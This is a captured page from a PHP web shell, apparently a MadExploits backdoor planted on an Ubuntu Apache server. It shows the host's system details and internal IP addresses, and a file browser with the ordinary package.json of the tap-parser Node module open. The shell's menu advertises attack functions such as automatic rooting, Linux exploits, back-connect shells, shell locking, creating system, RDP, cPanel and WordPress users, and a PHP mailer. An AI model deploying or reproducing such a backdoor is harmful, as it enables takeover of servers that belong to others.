Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
tap-parser /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
index.js
26.06
KB
-rw-r--r--
package.json
1.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "tap-parser", "version": "7.0.0", "description": "parse the test anything protocol", "main": "index.js", "bin": { "tap-parser": "bin/cmd.js" }, "dependencies": { "events-to-array": "^1.0.1", "js-yaml": "^3.2.7" }, "devDependencies": { "glob": "^7.0.5", "tap": "^10.3.3" }, "scripts": { "test": "tap test/*.js --100 -J", "regen-fixtures": "node scripts/generate-test.js test/fixtures/*.tap", "preversion": "npm test", "postversion": "npm publish", "postpublish": "git push origin --all; git push origin --tags" }, "testling": { "files": "test/*.js", "browsers": [ "ie/6..latest", "chrome/10", "chrome/latest", "firefox/3.5", "firefox/latest", "opera/latest", "safari/latest" ] }, "repository": { "type": "git", "url": "git://github.com/tapjs/tap-parser.git" }, "homepage": "https://github.com/tapjs/tap-parser", "keywords": [ "tap", "test", "parser" ], "author": { "name": "James Halliday", "email": "mail@substack.net", "url": "http://substack.net" }, "license": "MIT", "optionalDependencies": {}, "files": [ "index.js", "bin/cmd.js", "bin/usage.txt" ] }
Close